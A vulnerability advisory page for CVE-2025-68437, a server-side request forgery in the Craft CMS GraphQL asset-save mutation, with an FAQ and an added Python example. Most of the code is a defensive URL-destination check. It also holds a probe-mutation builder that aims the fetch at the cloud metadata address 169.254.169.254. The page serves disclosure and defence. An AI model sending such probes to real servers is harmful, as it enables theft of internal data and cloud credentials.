Vulnerability Description
Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16, the Craft CMS GraphQL `save_<VolumeName>_Asset` mutation is vulnerable to Server-Side Request Forgery (SSRF). The mutation's `_file` input accepts a `url` field, and the server fetches whatever that URL points to without validating the destination. An attacker who can call the mutation can therefore supply loopback or internal IP addresses, or a cloud metadata endpoint, and make the Craft server request those restricted services on their behalf. The response body is stored as a regular asset in the volume, so the attacker can then download it through the normal asset URL and exfiltrate internal data (metadata credentials, internal service responses), which can lead to wider infrastructure compromise. Exploitation is not unauthenticated: the GraphQL schema in use must grant asset-save permission for the targeted volume, so a public schema that exposes asset mutations is the worst case. Craft 5.8.21 and 4.16.17 fix the issue; upgrade to those releases, and until then remove asset mutations from any GraphQL schema that untrusted clients can use.
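The following is an added example written for this page, not code from Craft CMS or the advisory. It shows both sides of the issue described above: the shape of the GraphQL request an authorised tester would send to confirm whether a volume's `save_<VolumeName>_Asset` mutation will fetch an attacker-chosen URL, and the destination check that the mutation lacked in affected versions, which can be applied server-side before any fetch or in a proxy/WAF that inspects GraphQL bodies. Only the mutation name, the `_file` argument and its `url` field come from the advisory; the volume handle `uploads`, the selection set `{ id filename url }`, the variable name `$url`, and the fake DNS table are assumptions made for the example. The check generalises beyond the metadata-address case in the text: it rejects every non-public destination (loopback, RFC 1918, link-local, ULA, CGNAT, IPv4-mapped IPv6) and evaluates every address a hostname resolves to, so a name that answers with a public and an internal address is still refused.

```python
"""Added example for CVE-2025-68437 (not Craft CMS code).

  * build_probe_mutation(): the GraphQL body an authorised tester sends to
    see whether save_<Volume>_Asset pulls bytes from a URL they choose;
  * classify_fetch_url() / audit_request(): the pre-fetch destination check
    that affected versions did not perform.
Mutation name, `_file` and `url` are from the advisory; everything else
(volume handle, selection set, variable name, fake DNS data) is assumed.
"""
from __future__ import annotations

import ipaddress
import re
import socket
from typing import Callable, Iterable
from urllib.parse import urlsplit

Resolver = Callable[[str], Iterable[str]]  # hostname -> IP address strings


def build_probe_mutation(volume_handle: str, target_url: str) -> dict:
    """JSON body for a GraphQL POST asking Craft to fetch the asset's bytes
    from target_url. The selection set `{ id filename url }` is assumed."""
    query = (
        "mutation Probe($url: String!) {\n"
        f"  save_{volume_handle}_Asset(_file: {{ url: $url }}) {{ id filename url }}\n"
        "}"
    )
    return {"query": query, "variables": {"url": target_url}}


def resolve_with_system_dns(host: str) -> list[str]:
    """Default resolver: every A/AAAA answer, so a name that mixes public and
    internal addresses is judged on all of them, not on the first one."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


# Constructed DNS table for offline demonstration and tests (not real hosts).
CONSTRUCTED_DNS = {"cdn.example": ["1.1.1.1"], "rebind.example": ["1.1.1.1", "10.0.0.5"]}


def fake_resolver(host: str) -> list[str]:
    if host not in CONSTRUCTED_DNS:
        raise OSError("NXDOMAIN")
    return CONSTRUCTED_DNS[host]


def _is_internal(address: str) -> bool:
    ip = ipaddress.ip_address(address)
    if ip.version == 6 and ip.ipv4_mapped is not None:  # ::ffff:10.0.0.1 is still 10.0.0.1
        ip = ip.ipv4_mapped
    # Anything not globally routable: loopback, RFC 1918, link-local
    # (169.254.169.254 is the cloud metadata address), ULA, CGNAT, 0.0.0.0.
    return not ip.is_global


def classify_fetch_url(url: str, resolver: Resolver = resolve_with_system_dns) -> tuple[bool, str, list[str]]:
    """Decide whether a server-side fetch of url is acceptable.
    Returns (allowed, reason, resolved_addresses); the caller should connect to
    one of the returned addresses rather than resolve again, because a second
    lookup is where DNS rebinding would slip past this check."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed", []
    host = parts.hostname
    if not host:
        return False, "missing host", []
    try:
        addresses = [str(ipaddress.ip_address(host))]  # literal address: no lookup
    except ValueError:
        try:
            addresses = list(resolver(host))  # resolver output is what gets checked
        except OSError as exc:
            return False, f"resolution failed: {exc}", []
    if not addresses:
        return False, "no addresses", []
    internal = [a for a in addresses if _is_internal(a)]
    if internal:
        return False, f"resolves to non-public address {internal[0]}", addresses
    return True, "ok", addresses


_INLINE_FILE_URL = re.compile(r'_file\s*:\s*\{[^}]*?\burl\s*:\s*"((?:[^"\\]|\\.)*)"')


def _strings_in(value) -> Iterable[str]:
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for v in value.values():
            yield from _strings_in(v)
    elif isinstance(value, list):
        for v in value:
            yield from _strings_in(v)


def extract_file_urls(body: dict) -> list[str]:
    """Candidate fetch URLs in a GraphQL request body: `url` literals inside an
    inline `_file` argument, plus any URL-shaped string among the variables
    (the whole `_file` object may arrive as a variable instead)."""
    found = _INLINE_FILE_URL.findall(body.get("query", ""))
    found += [s for s in _strings_in(body.get("variables") or {}) if re.match(r"[a-z][a-z0-9+.-]*://", s, re.I)]
    return found


def audit_request(body: dict, resolver: Resolver = resolve_with_system_dns) -> list[tuple[str, bool, str]]:
    """Run classify_fetch_url over every candidate URL in a request body; the
    disallowed entries are what a server-side check or WAF rule should block."""
    return [(u, *classify_fetch_url(u, resolver)[:2]) for u in extract_file_urls(body)]


if __name__ == "__main__":
    probe = build_probe_mutation("uploads", "http://169.254.169.254/latest/meta-data/")
    for url, allowed, reason in audit_request(probe):
        print(f"{'ALLOW' if allowed else 'BLOCK'} {url} ({reason})")
```

Run against your own instance only with the volume's real handle and a schema token you are authorised to use; a successful probe returns an asset whose `url` serves the fetched body, which is exactly the exfiltration path the advisory describes. On the defensive side, the important detail is that the check returns the resolved addresses so the fetch can be pinned to them; validating the hostname and then letting the HTTP client resolve it again leaves a rebinding window.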
CVSS Score
6.8 (MEDIUM)
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Craftcms | Craft Cms | >= 4.0.0-RC1, < 4.16.17 |
| Craftcms | Craft Cms | >= 5.0.0-RC1, < 5.8.21 |
Related Weaknesses (CWE)
- CWE-918: Server-Side Request Forgery (SSRF)
References
- https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04 (Product, Release Notes)
- https://github.com/craftcms/cms/commit/013db636fdb38f3ce5657fd196b6d952f98ebc52 (Patch)
- https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc (Exploit, Vendor Advisory)
FAQ
What is CVE-2025-68437?
CVE-2025-68437 is a Server-Side Request Forgery (SSRF) vulnerability in Craft CMS with a CVSS score of 6.8 (MEDIUM). In versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16, the GraphQL `save_<VolumeName>_Asset` mutation fetches the `url` given in its `_file` input without validating the destination, so a caller with asset-save permission in that volume can make the server request internal services or cloud metadata endpoints and then read the response back as a stored asset.
How severe is CVE-2025-68437?
CVE-2025-68437 has been rated MEDIUM with a CVSS base score of 6.8/10. The score reflects that the attacker needs a GraphQL schema granting asset-save permission for the targeted volume; the impact is disclosure of whatever internal or metadata services the Craft server can reach, which in cloud deployments can include instance credentials.
Is there a patch for CVE-2025-68437?
Yes. The issue is fixed in Craft CMS 5.8.21 and 4.16.17 (see the vendor advisory, the 5.8.21 changelog entry and the fix commit in the references above). If you cannot upgrade immediately, remove asset mutations from any GraphQL schema exposed to untrusted or public clients, and if an affected instance was reachable by such clients, review the assets created in those volumes for fetched internal content and rotate any cloud credentials that could have been read from the metadata endpoint.